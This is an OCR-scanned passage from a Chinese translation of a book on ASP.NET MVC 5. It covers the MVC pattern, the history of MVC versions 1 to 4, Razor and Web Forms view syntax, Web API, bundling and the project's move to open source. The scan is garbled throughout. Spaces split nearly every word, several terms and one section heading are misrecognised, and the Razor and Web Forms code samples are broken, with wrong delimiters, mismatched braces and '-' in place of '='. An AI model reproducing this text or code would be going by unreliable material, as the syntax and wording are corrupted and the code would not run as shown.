用 的 状态 (semi-magical statefulness) 来 处 理 后 台 的 复杂 事务 (但 这 样 具有 经 常 混淆 页 面 生 命 周 
期 ， 生 成 不 太 理 想 的 HTML 页 面 等 缺点 )。 

然而 ， 总 是 会 有 发 生 下 面 所 述 情况 的 可 能 性 ， 即 通过 使 用 处 理 器 、 组 件 模块 和 其 他 手写 
代码 来 直接 响应 HTTP 请 求 ， 按 照 想 要 的 方式 构建 Web 框 架 ， 设计 出 精彩 的 HTML 页 面 。 虽然 
可 以 这 样 做 , 但 实现 起 来 非常 困难 , 这 并 不 是 因为 在 广泛 的 计算 机 科学 世界 中 缺乏 设计 模式 ， 
而 是 因为 缺乏 一 种 内 置 的 模式 支持 这 样 的 实现 。 在 2007 年 ASPNETMVC 宣 布 开 发 之 时 , MVC 
模式 已 成 为 构建 Web 框 架 最 流行 的 方式 之 一 。 


1.1.2 MVC 模式 简介 


MVC 成 为 计算 机 科学 领域 重要 的 构建 模式 已 有 多 年 历史 。1979 年 ， 它 最 初 被 命名 为 事 
物 -模型 -视图 -编辑 器 (Thing-Model-View-Editor)， 后 来 简化 成 了 模型 -视图 -控制 器 
(Model-View-Controller). 在 分 离 应 用 程序 内 部 的 关注 点 方面 (例如 ,从 显示 逻辑 中 分 离 出 数据 
访问 逻辑 )，MVC 是 一 种 强大 而 简洁 的 方式 ， 尤 其 适合 应 用 在 Web 应 用 程序 中 。 虽 然 关注 点 的 
显 式 分 离 在 一 定 程度 上 增加 了 应 用 程序 设计 的 复杂 性 , 但 总 体 来 说 , MVC 带 来 的 益处 要 超过 
它 所 带 来 的 商 端 。 自 从 引入 以 来 ，MVC 已 经 在 数 十 种 框架 中 得 到 应 用 ， 在 Java 和 C++ 语 言 中 ， 
在 Mac 和 Windows 操 作 系 统 中 以 及 在 很 多 架构 内 部 都 用 到 了 MVC。 

MVC 将 应 用 程序 的 用 户 界面 (User Interface，UD 分 为 三 个 主要 部 分 : 

e 模型 : 一 组 类 ， 描 述 了 要 处 理 的 数据 以 及 修改 和 操作 数据 的 业务 规则 。 

e 视图 : 定义 应 用 程序 用 户 界 面 的 显示 方式 。 

e 控制 器 : 一 组 类 ， 用 于 处 理 来 自用 户 、 整 个 应 用 程序 流 以 及 特定 应 用 程序 逻辑 的 通 

信 。 


MVC 作 为 用 户 界面 模式 


注意 这 里 的 MVC 指 的 是 一 种 用 户 界面 模式 。MVC 模 式 是 处 理 用 户 交互 的 一 种 解决 方 
案 ， 它 并 不 处 理应 用 程序 关注 的 其 他 问题 ， 如 数据 访问 、 服 务 交互 等 。 学 习 MVC 时 ， 记 住 这 
一 点 很 有 帮助 : MVC 是 一 种 有 用 的 模式 ， 但 是 可 能 只 是 在 开发 应 用 程序 时 用 到 的 许多 模式 
ae 


1.1.3. MVC 在 Web 框 架 中 的 应 用 


MVC 模 式 经 常 应 用 于 Web 程 序 设计 中 。 在 ASPNET MVC 中 ，MVC 三 个 主要 部 分 的 定义 
大 致 如 下 : 

e 模型 : 模型 是 描述 程序 设计 人 员 感 兴趣 问题 域 的 一 些 类 , 这 些 类 通常 封装 存储 在 数据 

库 中 的 数据 ， 以 及 操作 这 些 数据 和 执行 特定 域 业务 逻辑 的 代码 。 在 ASPNETMVC 中 ， 

模型 就 像 使 用 了 某 种 工具 的 数据 访问 层 (Data Access Layer)， 这 种 工具 包括 实体 框架 


(Entity Framework) 或 者 与 包含 特定 域 逻辑 的 自 定义 代码 组 合 在 一 起 的 NHibernate。 

e 视图 : 一 个 动态 生成 HTML 页 面 的 模板 ， 这 一 内 容 将 在 第 3 章 详细 阐述 。 

e 控制 器 : 一 个 协调 视图 和 模型 之 间 关 系 的 特殊 类 。 它 响 应 用 户 输入 , 与 模型 进行 对 话 ， 
并 决定 呈现 哪个 视图 (如 果 有 的 话 )。 在 ASPNET MVC 中 ， 这 个 类 文件 通常 以 后 级 名 
Controller 表 示 。 

© 注意 ，MVC 是 一 种 高 级 架构 模式 ， 它 的 使 用 取决 于 具体 应 用 环境 ， 记 住 这 一 点 
是 很 重要 的 。ASPNET MVC 的 上 下 文 是 问题 域 (一 个 无 状态 的 Web 环 境 ) 和 宿主 
系统 (ASPNET)。 

笔者 时 常 与 一 些 具有 MVC 开 发 经 验 的 人 员 聊 天 ， 他 们 在 互 不 相同 的 环境 下 
使 用 MVC 模 式 ， 他 们 感到 困惑 、 温 喜 ， 主 要 是 因为 他 们 认为 ASPNET MVC 的 工 
作 原 理 与 15 年 前 在 他 们 的 大 型 机 账户 处 理 系统 中 的 原理 是 一 样 的 。 事 实 并 非 如 
此 ， 这 是 一 件 好 事 ，ASPNET MVC 注 重 应 用 MVC 模 式 来 提供 一 个 运行 在 .NET 
平台 上 的 强大 Web 开 发 框架 ， 上 下 文 则 是 其 强大 原因 的 一 部 分 。 

ASPNETMVC 依 赖 的 许多 核心 策略 ， 与 其 他 MVC 平 台所 使 用 的 策略 相同 ， 
再 加 上 它 提供 的 编译 和 托管 代码 的 好 处 ， 以 及 利用 .NET 语言 的 新 特性 ， 比 如 
lambda 表 达 式 、 动 态 和 匿名 类 型 ， 使 其 成 为 强大 的 开发 框架 。 不 过 ， 本 质 上 ， 
ASPNET 采 用 了 大 部 分 基于 MVC 的 Web 框 架 所 使 用 的 一 些 基本 原则 : 

e 约定 优 于 配置 (convention over configuration) 

e 不 重复 (又 名 DRY 原 则 ) 

e 尽量 保持 可 插 拔 性 (pluggability) 

e 尽量 为 开发 人 员 提 供 帮 助 ， 但 必要 时 允许 开发 人 员 自由 发 挥 


1.1.4 ASP.NET MVC 5 的 发 展 历程 


自 2009 年 3 月 ，ASPNET MVC 1 发 布 起 ， 在 短 短 5 年 的 时 间 里 ，ASPNET MVC 已 经 发 布 
了 5 个 主要 版 本 , 期 间 还 有 一 些 临时 版 本 。 为 更 好 地 理解 ASPNETMVC 5, 首先 知道 ASPNET 
MVC 的 发 展 历程 是 很 重要 的 。 本 节 主 要 描述 3 个 ASPNETMVC 版 本 的 内 容 及 其 发 布 背景 。 


别 慌 ! 

本 节 会 列举 MVC 特 定 的 一 些 特性 ， 但 如 果 你 是 刚刚 才 接触 MVC， 可 能 还 无 法 理解 它们 。 
不 过 不 用 担心 ! 我 们 将 解释 MVC 5 的 一 些 背 景 , 不 过 如 果 一 时 无 法 理解 ,可 以 浏览 这 些 内 容 ， 
或 者 直接 跳 到 “创建 MVC 5 应 用 程序 ”一 节 。 后 面 的 章节 会 帮助 你 理解 这 些 内 容 。 


1. ASP.NET MVC 1 概述 


2007 年 2 月 ，Microsoft 公 司 的 Scott Guthrie(“ScottGu”) 飞 往 美国 东海 岸 参加 会 议 。 在 旅途 
中 ， 他 草拟 编写 了 ASPNET MVC 的 内 核 程 序 。 这 是 一 个 只 有 几 百 行 代 码 的 简单 应 用 程序 ， 但 
它 却 给 大 部 分 追随 Microsoft 公 司 的 Web 开 发 人 员 带 来 了 美好 前 景 。 


ASP.NET MVC 5 高 级 编程 (第 5 版 ) 


据说 ，2007 年 10 月 ， 在 华盛顿 州 雷 德 蒙 市 举行 的 Austin ALTNET 会 议 上 ，ScottGu 告诉 
一 些 开 发 者 说 “我 在 飞机 上 写 了 这 个 好 东西 ”并 询问 他 们 是 否 看 到 需求 以 及 对 该 应 用 程序 的 
看 法 。 此 举 一 炮 打响 。 事 实 上 ， 许 多 人 都 参与 了 该 应 用 程序 原型 的 设计 ， 并 把 代码 命名 为 
Scalene. Eilon Lipton 于 2007 年 9 月 把 第 一 份 原型 电邮 给 他 的 团队 ,， 并 和 ScottGu 在 原型 、 代 码 、 
想法 上 多 次 思考 ， 反 复 苦 酌 。 

即使 在 官方 发 布 之 前 ， 也 可 以 明显 看 到 ASPNET MVC 不 是 标准 的 Microsoft 产 品 。 
ASPNET MVC 的 开发 周期 是 高 度 交 互 的， 在 官方 版 本 发 布 之 前 已 有 9 个 预览 版 本 ， 它 们 都 进 
行 了 单元 测试 ， 并 在 开源 许可 下 发 布 了 代码 。 所 有 这 些 都 突出 了 一 个 哲理 : 在 整个 研发 过 程 中 
要 高 度 重视 团队 的 协作 交互 。 最 终结 果 是 在 ASPNET MVC 1 的 官方 版 本 发 布 时 (包含 代码 测试 
和 单元 测试 )， 已 经 被 那些 将 一 直 使 用 它 的 开发 者 多 次 使 用 和 审查 。ASPNET MVC 1 于 2009 
年 3 月 13 日 正式 发 布 。 


2. ASP.NET MVC 2 概述 


与 ASPNET MVC 1 发 布 时 隔 一 年 ，ASPNET MVC 2 于 2010 年 3 月 发 布 。ASPNETMVC 2 
的 部 分 主要 特点 如 下 : 

e 带 有 自 定义 模板 的 UI 辅助 程序 

o 在 客户 端 和 服务 器 端 基于 特性 的 模型 验证 

e 强 类 型 HTML 辅助 程序 

e 改善 的 Visual Studio 开 发 工具 

根据 应 用 ASPNET MVC 1 开发 各 种 应 用 程序 的 开发 人 员 的 反馈 意见 ，ASPNET MVC 2 中 
增强 了 许多 API 的 功能 以 增强 其 专业 性 ， 比 如 : 

e. 支持 将 大 型 应 用 程序 划分 为 域 

e 支持 异步 控制 器 

e 使 用 Html.RenderAction 支 持 泻 染 网 页 或 网 站 的 某 一 部 分 

e 许多 新 的 辅助 函数 、 实 用 工具 和 API 增 强 

ASPNET MVC ?发 布 的 一 个 重要 先例 是 很 少 有 重大 改动 ， 这 是 ASPNET MVC 结 构 化 设 
计 的 一 个 证 明 ， 这 样 就 可 以 实现 在 核心 不 变 的 情况 下 进行 大 量 的 扩展 。 


3. ASP.NET MVC 3 概述 


在 Web Matrix 发 布 的 推动 下 , ASPNET MVC 3 于 ASPNET MVC 2 发布 之 后 的 第 10 个 月 推 
出 。ASPNET MVC 3 的 主要 特征 如 下 : 

e 支持 Razor 视 图 引擎 

e 支持 NET4 数据 注解 

e 改进 了 模型 验证 

e 提供 更 强 的 控制 和 更 大 的 灵活 性 ， 支 持 依赖 项 解析 (Dependency Resolution) 和 全 局 操 

作 过 滤器 (Global Action Filter) 
e 丰富 的 JavaScript 支 持 ， 其 中 包括 非 侵 入 式 JavaScript、jQuery 验 证 和 JSON 绑 定 
e 支持 NuGet， 可 以 用 来 发 布 软件 ， 管 理 整个 平台 的 依赖 
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自 10 余 年 前 ASPNET 1.0 发 布 以 来 ，Razor 是 在 泻 染 HIML 方 面 的 第 一 个 重大 更 新 。 在 
ASPNET MVC 1 和 ASPNET MVC 2 中 默认 使 用 的 视图 引擎 普遍 称 为 Web Forms 视 图 引擎 
(Web Forms View Engine)， 因 为 它 和 Web Forms 使 用 了 同样 的 ASPX/ASCX/MASTER 文 件 和 语 
ik. 但 是 它 的 设计 目标 是 支持 在 图 形 编辑 器 中 的 编辑 控件 。 下 面 是 在 Web Forms 页 面 中 这 种 
语法 的 一 个 示例 : 

«$0 Page Language="C#" 

MasterPageFile-"-/Views/Shared/Site.Master" Inherits- 


"System.Web.Mvc.ViewPage«MvcMusicStore.ViewModels.StoreBrowseViewModel»" 
$> 


<asp:Content ID-"Contentl" ContentPlaceHolderID-"TitleContent" 
runat-"server"» Browse Albums 
«/asp:Content» 


«asp:Content ID-"Content2" ContentPlaceHolderID-"MainContent" 
runat="server"> 
<div class="genre"> 
«h3»«em»«$: Model.Genre.Name %></em> Albums</h3> 
<ul id="album-list"> 
<% foreach (var album in Model.Albums) { $» 
«li» 
«a href-"«$: Url.Action("Details", new ( id = album.AlbumId )) $»"» 
«img alt-"«$: album.Title $»" src-"«$: album.AlbumArtUrl $5" /> 
«span»«$: album.Title $»«/span» 
</a> 
«/1i» 
<% } $5 
«/ul» 
</div> 
</asp:Content> 


Razor 被 专门 设计 成 视图 引擎 的 语法 。 它 有 一 个 主要 的 作用 : 集中 生成 HTML 代码 模板 。 
下 面 展示 如 何 应 用 Razor 生 成 同样 的 标记 : 


@model MvcMusicStore.Models.Genre 


@{ViewBag.Title = "Browse Albums";} 


<div class="genre"> 
<h3><em>@Model .Name</em> Albums</h3> 


«ul id-"album-list"» 
Gforeach (var album in Model.Albums) 
t 
«li» 
«a href-"Q(Url.Action("Details", new ( id = album.AlbumId })"> 
«img alt-"(album.Title" src-"(album.AlbumArtUrl" /> 
«span»8album.Titlec/span» 
«/a» 
</li> 
} 
</ul> 
</div> 
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Razor 语 法 易于 输入 和 阅读 。Razor 不 像 Web Forms 视 图 引擎 那样 具有 类 似 于 XML 的 繁杂 语 
法 规则 。 第 3 章 将 详细 讨论 Razor。 


1.1.5 ASPNET MVC 4 概述 


ASPNET MVC 4 建立 在 相当 成 熟 的 基础 上 ， 能 够 把 重点 放 在 一 些 高 级 应 用 上 。 它 的 主要 
功能 包括 : 
e ASP.NET Web API 
o 增强 了 默认 的 项 目 模板 
添加 使 用 jQuery Mobile 的 手机 项 目 模板 
支持 显示 模式 (Display Mode) 
支持 异步 控制 器 的 任务 
捆绑 和 微小 (minification) 
为 MVC 4 的 发 布 时 间 并 不 算 特 别 久 ， 所 以 下 面 将 对 这 些 功 能 多 做 一 些 介绍 。 全 书 会 对 
它们 进行 更 加 详细 的 剖析 讲解 。 
1. ASP.NET Web API 


设计 ASPNET MVC 的 目的 是 用 来 创建 网 站 ， 因 此 ， 整 个 平台 的 设计 目标 很 明确 : 响应 浏 
览 器 的 请 求 ， 并 返回 HTML。 
然而 ，ASPNET MVC 使 得 控制 到 字 节 的 响应 变 得 非常 容易 ， 而 且 MVC 模 式 在 创建 服务 
层 时 非常 有 用 。ASPNET 开 发 人 员 发 现 ， 使 用 MVC 可 以 创建 Web 服 务 ， 这 些 服务 可 以 返回 
XML 、JSON 或 其 他 非 HIML 格 式 的 数据 ， 并 且 比 使 用 其 他 服务 框架 (比如 Windows 
Communication Foundation(WCF) 或 编写 原始 的 HITP 处 理 程序 ) 更 容易 。 尽 管 如 此 ， 它 仍 存在 
一 些 不 足 之 处 ,比如 我 们 需要 使 用 网 站 框架 来 传送 服务 。 但 总 体 而 言 , MVC 要 优 于 其 他 框架 。 
ASPNET MVC 4 引入 了 一 个 好 的 解决 方案 : ASPNET Web API( 简 称 Web APD 。 它 是 一 个 
提供 了 ASPNET MVC 开 发 风格 的 框架 ， 但 它 专门 用 来 编写 HTTP 服 务 。 该 框架 包括 在 HTTP 
服务 域 修改 一 些 ASPNET MVC 概 念 ， 并 提供 一 些 新 的 面向 服务 的 功能 。 
下 面 是 一 些 类似 MVC 的 Web API 功 能 ， 它 们 只 适用 于 HTTP 服 务 域 : 
e 路 由 : ASP.NET Web API 使 用 同样 的 路 由 系统 ,将 URL 映 射 到 控制 器 操作 。 它 按照 约 
定 将 HTTP 动 词 映 射 到 操作 ， 从 而 实现 将 路 由 融入 HTTP 服 务 上 下 文 ， 这 样 既 可 以 使 代 
码 更 加 易于 阅读 ， 同 时 也 鼓励 了 RESTful 服 务 设计 。 
e 模型 绑 定 和 验证 : 和 MVC 简 化 映射 输入 值 (表单 域 、cookies、URI 参 数 等 ) 到 模型 值 的 
过 程 一 样 ，Web API 自 动 把 HTTP 请 求 值 映射 到 模型 。 绑 定 系统 具有 良好 的 扩展 性 ， 
并 且 和 我 们 在 MVC 模 型 绑 定 中 一 样 ， 它 也 包括 基于 特性 的 验证 。 
e 过 滤器 : MVC 使 用 过 滤器 (第 15 章 中 介绍 ) 以 便 通 过 特性 向 操作 添加 行为 。 例 如 ， 向 某 
个 MVC 操 作 添加 [Authorize] 特 性 将 会 阻止 用 户 的 匿名 访问 。 当 用 户 匿 名 访问 时 ， 页 盏 
就 会 自动 重 定向 到 登录 页 面 。Web API 也 支持 一 些 标准 的 MVC 过 滤器 ， 比 如 一 个 服务 
优化 的 [Authorize] 特 性 。 此 外 ， 也 可 以 根据 需要 自 定义 过 滤器 。 


me 


e 基 架 : 可 使 用 和 添加 MVC 控 制 器 (可 参阅 本 章 后 面部 分 ) 一 样 的 对 话 框 来 添加 新 的 Web 
API 控 制 器 。 也 可 以 选用 Add Controller 对 话 框 来 快速 地 搭建 一 个 基于 实体 框架 模型 类 
型 的 Web API 控 制 器 。 

e 简易 的 单元 测试 : 这 一 点 和 MVC 很 像 ， Web API 建 立 在 依赖 注入 和 避免 全 局 状态 使 用 
的 概念 之 上 。 

除 此 之 外 ，Web API 专 门 为 HTTP 服 务 的 开发 添加 了 一 些 新 的 概念 和 功能 : 

e _ HTTP 编程 模型 : 为 了 更 好 地 处 理 HTTP 请 求 和 响应 ，Web API 开 发 体验 得 到 优化 。 提 
供 了 一 个 强 类 型 的 HTTP 对 象 模型 、HTTP 状 态 码 和 容易 访问 的 headers 等 。 

e 基于 HTTP 动 词 的 动作 调度 : MVC 根 据 操作 方法 的 名 称 来 调度 ， 而 Web API 则 根据 
HTTP 动 词 自动 调度 操作 方法 。 例 如 ， 一 个 GET 请 求 会 被 自动 调度 到 一 个 名 为 GetItem 
的 控制 器 操作 。 

e 内 容 协商 : HTTP 已 经 长 期 支持 内 容 协 商 系统 ， 在 这 些 系 统 中 ， 浏 览 器 (和 其 他 HTTP 
客户 端 ) 给 出 它们 的 响应 格式 优先 级 ， 服 务 器 用 它 支 持 的 首选 格式 做 出 响应 。 这 样 我 
们 的 控制 器 就 可 以 提供 XML、JSON 和 其 他 格式 (根据 需要 可 以 添加 自己 的 格式 ) 来 响 
应 客户 端 最 想 要 的 格式 。 这 样 就 可 以 为 新 数据 格式 提供 支持 ， 而 不 需要 修改 控制 器 的 
代码 。 

e 基于 代码 的 配置 ; 服务 配置 是 复杂 的 。WCF 采 用 宛 长 复杂 的 配置 文件 来 完成 配置 ， 
与 其 不 同 的 是 ，Web API 完 全 通过 代码 配置 。 

虽然 ASPNET Web API 包 含 在 ASPNET MVC 4 中 ， 但 它 可 以 单独 使 用 。 事 实 上 ， 它 与 

ASPNET 不 存在 任何 依赖 关系 ， 并 且 可 以 自 托 管 一 -也 就 是 说 ， 独 立 于 ASPNET 和 IIS。 这 意 
味 着 Web API 可 以 运行 在 任何 .NET 应 用 程序 中 ， 可 以 是 一 个 Windows 服 务 ， 甚 至 是 一 个 简单 
的 控制 台 应 用 程序 。 想 更 详细 地 学 习 ASPNET Web API， 请 参阅 第 11 章 。 


注意 如 前 所 述 ，MVC 和 Web API 在 很 多 方面 都 很 类 似 ， 如 模型 -控制 器 模式 、 

| ”路 由 、 过 滤器 等 。 在 MVC 4 和 MVC 5 中 ， 架 构 上 的 原因 决定 了 它们 是 单独 的 框 
架 ， 只 是 共享 一 些 相 同 的 模型 和 范式 。 例 如 ，MVC 一 直 保持 着 与 ASPNET 兼 容 ， 
并 且 维 护 着 与 ASPNET 相 同 的 代码 库 (如 System Web 的 HttpContexb， 但 是 这 不 符 
合 Web API 的 长 期 目标 。 

2014 年 5 月 ，ASPNET 团 队 宣布 ， 他 们 计划 在 MVC 6 中 将 MVC、Web API 和 
Web Pages 合 并 起 来 。MVC 6 是 ASPNET vNext 的 一 部 分 ， 而 ASPNET vNextit X] 
运行 在 “针对 云 优化 ”的 NET Framework 版 本 上 。 这 些 框架 的 变化 是 让 MVC 不 
再 受 限 于 System.Web 的 一 个 好 机 会 ,这 意味 着 把 MVC 和 Web API 合 并 起 来 更 加 容 
易 ,从 而 形成 下 一 代 的 Web 堆 栈 .其 目标 是 支持 MVC 5, 尽量 不 做 重大 修改 . NET 
Web Development and Tools 博 客 上 发 表 的 文章 列 出 了 下 面 这 些 计划 : 

e MVC, Web API 和 Web Pages 将 被 合并 到 一 个 框架 中 , 即 MVC 6。MVC 6 

不 依赖 于 System .Web。 
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e ASP.NET vNext 包 含 新 的 、 针 对 云 优化 过 的 MVC 6、SignalR 3 和 EF 7. 

© ASP.NET vNext 将 支持 真正 的 并 行 部 署 所 有 依赖 项 , 包括 .NET for cloud. 
依赖 项 将 不 再 安装 到 GAC 中 。 

e ASPNET vNext 并 没有 固定 到 特定 宿主 。 可 以 将 应 用 程序 部 署 到 IIS 中 ， 
也 可 以 使 其 驻 留 在 自 定义 进程 中 。 

o 依赖 注入 被 内 置 到 框架 中 。 

e ASP.NET vNext 将 完全 支持 Web Forms, MVC 5, Web API 2, Web Pages 3、 
SignalR2, EF 6. 

e. NET vNext( 针 对 云 优化 ) 会 是 NET vNext Framework 的 一 个 子 集 , 针对 云 
和 服务 器 负载 进行 了 优化 。 

© MVC 6, SignalR 3 和 EF 7 将 有 突破 性 变化 : 
。 新 的 项 目 系 统 
。 新 的 配置 系统 
* MVC. Web API 和 Web Pages 将 被 合并 起 来 ， 并 将 为 HTTP、 路 由 、 操 

作 选 择 、 过 滤器 、 模 型 绑 定 等 使 用 公共 的 一 组 抽象 

。 没有 System Web， 使 用 新 的 轻 量 级 的 HttpContext 

更 多 信息 请 访问 http://blogs.msdn.com/b/webdev/archive/2014/05/13/asp-net- 

vnext-the-future-of-net-on-the-server.aspx 。 


2. 显示 模式 


显示 模式 根据 浏览 器 发 出 的 请 求 ， 使 用 基于 约定 的 方法 来 选择 不 同 的 视图 。 当 浏览 器 的 
用 户 代理 指示 一 台 已 知 的 移动 设备 时 ， 默 认 的 视图 引擎 首先 查找 名 以 Mobile.cshtml 结 尾 的 视 
图 。 例 如 ， 如 果 网 站 项 目 中 有 一 个 通用 视图 和 一 个 移动 视图 ， 它 们 的 名 称 分 别 是 Index.cshtml 
和 Index.Mobile.cshtml， 那么 当 在 移动 浏览 器 网 站 访问 到 该 页 面 时 , MVC 5 将 自动 使 用 移动 视 
图 。 虽 然 移动 浏览 器 的 默认 页 面 确定 方式 基于 用 户 代理 检测 ， 但 是 也 可 以 通过 注册 自 定义 设 
备 模式 来 自 定义 此 逻辑 。 

第 16 章 讨论 移动 Web 时 ， 将 更 详细 地 介绍 显示 模式 。 


3. 捆绑 和 微小 框架 


ASPNET MVC 4( 及 更 新 版 本 ) 支 持 的 捆绑 和 微小 框架 与 ASPNET 4.5 中 包含 的 框架 相同 。 
该 框架 通过 合并 脚本 引用 可 以 把 若干 个 请 求 合并 为 一 个 请 求 ， 从 而 减少 发 送 到 站 点 的 请 求 数 
量 。 与 此 同时 ， 它 也 采用 各 种 技术 来 压缩 请 求 大 小 ， 比 如 缩短 变量 名 、 删 除 空格 和 注释 等 。 它 
也 很 好 地 适用 于 CSS， 可 以 把 若干 CSS 请 求 打包 成 一 个 请 求 ， 并 压缩 CSS 请 求 的 大 小 ， 使 其 用 
最 少 的 字 节 ， 产 生 等 价 的 规则 ， 也 采用 高 级 技术 ( 像 语 义 分 析 ) 来 折合 CSS 选 择 器 。 

捆绑 系统 是 高 度 配 置 的 ， 我 们 可 以 创建 包含 特定 脚本 的 自 定义 捆绑 ， 并 用 单一 的 URI 来 
引用 这 些 捆绑 。 当 使 用 Intemet 模 板 创建 新 的 MVC 5 应 用 程序 时 ， 我 们 通过 引 上 
/App_StarUBundleConfig .cs 中 列 出 的 默认 捆绑 ， 可 以 看 到 一 些 例子 。 
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使 用 捆绑 和 微小 系统 的 一 个 不 错 的 意外 收获 是 ， 我 们 可 从 视图 代码 中 删除 文件 引用 。 这 
样 我 们 就 可 以 在 不 更 新 视图 或 布局 的 情况 下 ， 添 加 或 升级 脚本 库 和 那些 拥有 不 同文 件 名 称 的 
CSS 文 件 ， 因 为 引用 的 是 脚本 或 CSS 绑 定 而 不 是 单独 文件 。 例 如 ，MVC Internet 应 用 程序 模板 
就 包含 一 个 不 依赖 于 版 本 号 的 jQuery 绑 定 。 


bundles .Add (new ScriptBundle ("-/bundles/jquery").Include( 
"-«/Scripts/jquery-(version).js")); 


然后 在 站 点 布局 (_Layout.cshtml) 中 ， 通 过 绑 定 URIL 来 引用 它 ， 代 码 如 下 : 
GScripts.Render ("~/bundles/jquery") 


由 于 这 些 引 用 不 用 绑 定 到 jQuery 版 本 号 ， 因 此 绑 定 和 微小 系统 将 自动 获得 更 新 的 jQuery 
库 ( 通 过 NuGet 或 手动 )， 而 不 需要 修改 任何 代码 。 


1.1.6 FRE 


从 最 初版 本 开始 , ASPNET MVC 一 直 都 遵循 开源 许可 条 例 , 但 它 只 是 开发 的 源 代码 而 不 
是 一 个 完全 开源 的 项 目 。 我 们 可 以 阅读 源 代码 ， 可 以 修改 源 代码 ， 甚 至 可 以 发 布 修改 后 的 源 
代码 ， 但 是 我 们 不 能 把 自己 的 代码 贡献 到 官方 的 MVC 代 码 库 。 

2012 年 5 月 的 ASPNET Web Stack 开 源 公告 改变 了 这 种 情况 。 这 一 公告 标志 着 ,ASPNET 
MVC、ASPNET Web Pages( 包 括 Razor 视 图 引擎 ) 和 ASPNET Web API 由 开源 许可 代码 正式 过 
渡 到 了 完全 的 开源 项 目 。 对 这 些 项 目的 所 有 代码 修改 和 问题 跟踪 都 能 够 反馈 到 公共 代码 库 中 ， 
并 且 在 开发 团队 同意 修改 生效 的 情况 下 ， 这 些 项 目 接受 社会 的 代码 贡献 ( 即 pull 请 求 )。 

该 项 目 成 为 开源 项 目 后 很 短 的 时 间 内 , 官方 源码 已 经 接受 了 一 些 bug 修 复 和 功能 增强 , 并 
且 接 受 的 这 些 更 新 和 MVC 5 一 起 发 布 。ASPNET 团 队 会 审查 和 测试 外 部 提交 的 代码 ， 并 且 当 
项 目 发 布 时 ， 与 前 面 的 ASPNET MVC 版 本 一 样 ， 由 Microsoft 支 持 。 

即使 我 们 不 打算 贡献 任何 源码 ， 公 共 代 码 库 也 在 可 视 化 方面 做 了 重大 改变 。 在 过 去 ， 需 
要 等 待 临 时 版 本 以 了 解 开发 团队 的 最 新 工作 进展 , 但 是 现在 我 们 可 以 查看 新 签 入 的 源码 (网 址 
是 http://aspnetwebstack.codeplex.com/SourceControl/list/changesets)， 甚 至 在 夜间 运行 新 发 布 的 
代码 以 测试 添加 的 新 功能 。 


1.2 ASP.NET MVC 5 概述 


2013 年 10 月 ，ASPNET MVC 5 与 Visual Studio 2013 一 起 发 布 。 这 个 版 本 的 关注 点 是 “One 
ASPNET” 计 划 ( 稍 后 介绍 )， 以 及 对 整个 ASPNET 框 架 所 做 的 核心 增强 。 下 面 列 出 了 一 些 主 
要 特性 : 

e One ASP.NET 

e 新 的 Web 项 目 体验 

e ASP.NET Identity 

e Bootstrap f 

e 特性 路 由 
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e ASPNET 基 架 

e 身份 验证 过 滤器 

e 过 滤器 重 写 
1.2.1 One ASPNET 


有 很 多 的 选项 是 好 事 。Web 应 用 程序 千差万别 ， 而 Web 工 具 和 平台 也 不 是 有 了 一 种 就 可 
以 应 对 所 有 情况 。 

但 是 另 一 方面 , 一 些 选项 会 让 我 们 缚 手 缚 脚 。 如果 选择 一 样 东西 意味 着 放弃 另 一 样 东 西 ， 
那么 我 们 不 希望 被 迫 必须 选择 它 。 这 一 点 特别 适用 于 开始 创建 项 目 时 的 选项 ;我们 刚刚 开始 
创建 项 目 ， 怎 么 知道 一 年 以 后 这 个 项 目 需要 什么 ! 

在 之 前 的 MVC 版 本 中 ， 每 次 创建 项 目 时 都 面临 着 选择 : 创建 一 个 MVC 应 用 程序 、Web 
Forms 应 用 程序 或 其 他 项 目 类 型 。 之 后 ， 实 际 上 我 们 就 被 限制 住 了 。 在 某 种 程度 上 ， 可 以 把 
Web Forms 添 加 到 一 个 MVC 应 用 程序 中 ， 但 是 把 MVC 添 加 到 Web Forms 应 用 程序 中 是 很 困难 
的 。MVC 应 用 程序 在 csproj 文 件 中 隐藏 了 一 种 特殊 的 项 目 类 型 GUID， 当 尝试 把 MVC 添 加 到 
Web Forms 应 用 程序 时 ， 这 只 是 必须 做 的 几 个 神秘 修改 之 一 。 

在 MVC 5 中 ， 情 况 发 生 了 变化 ， 因 为 现在 只 有 一 种 ASPNET 项 目 类 型 。 在 Visual Studio 
2013 中 创建 新 的 Web 应 用 程序 时 ， 没 有 复杂 的 选项 ， 只 有 Web 应 用 程序 。 不 只 是 在 一 开始 创 
建 ASPNET 项 目 时 才 支持 这 么 做 ;在 不 断 开 发 的 过 程 中 ， 可 以 添加 对 其 他 框架 的 支持 ， 因 为 
工具 和 特性 都 是 作为 NuGet 包 提供 的 。 例 如 ， 如 果 开 发 过 程 中 改变 了 想法 ， 就 可 以 使 用 
ASPNET 基 架 向 任何 现 有 的 ASPNET 应 用 程序 添加 MVC。 


1.2.2 ”新 的 Web 项 目 体验 


作为 新 的 One ASPNET 体 验 的 一 部 分 ，Visual Studio 2013 中 创建 新 的 MVC 应 用 程序 的 对 
话 框 已 被 合并 和 简化 。 本 章 后 面 的 “创建 ASPNET MVC 5 应 用 程序 ”一 节 将 详细 介绍 新 对 
话 框 。 
1.2.3 ASP.NET Identity 


MVC 5 彻底 重 写 了 成 员 和 身份 验证 系统 ， 使 其 成 为 新 的 ASPNET Identity 系 统 的 一 部 分 。 
这 个 新 系统 摆脱 了 原来 的 ASPNET 成 员 系统 的 陈旧 局 限 ， 并 使 MVC 4 的 Simple Membership 系 
统 变 得 更 加 成 熟 ， 可 配置 性 更 好 。 
下 面 列 出 了 ASPNET Identity 的 一 些 主要 的 新 特性 : 
e One ASPNET Identity 系 统 : 为 了 支持 前 面 介绍 的 One ASPNET 这 个 关注 点 ， 新 的 
ASP.NET Identity 被 设计 为 可 在 整个 ASP.NET 家 族 中 使 用 (包括 MVC、Web Forms, Web 
Pages. Web API、SignalR， 以 及 使 用 其 中 任何 技术 组 合 创建 的 混合 应 用 程序 )。 
e 控制 用 户 资料 数据 : 虽然 ASPNETI 的 成 员 系统 常 被 用 于 存储 关于 用 户 的 额外 的 、 自 定 
义 的 信息 ， 但 是 使 用 起 来 却 很 困难 。ASPNET Identity 使 得 存储 额外 的 用 户 信息 (如 账 
号 、 社 交 媒 体 信 息 和 联系 地 址 ) 很 容易 ， 只 需要 在 代表 用 户 的 模型 类 中 添加 属性 即 可 。 
e 控制 优 于 持久 化 : 默认 情况 下 , 所 有 用 户 信息 都 使 用 Entity Framework Code First 存 储 ， 
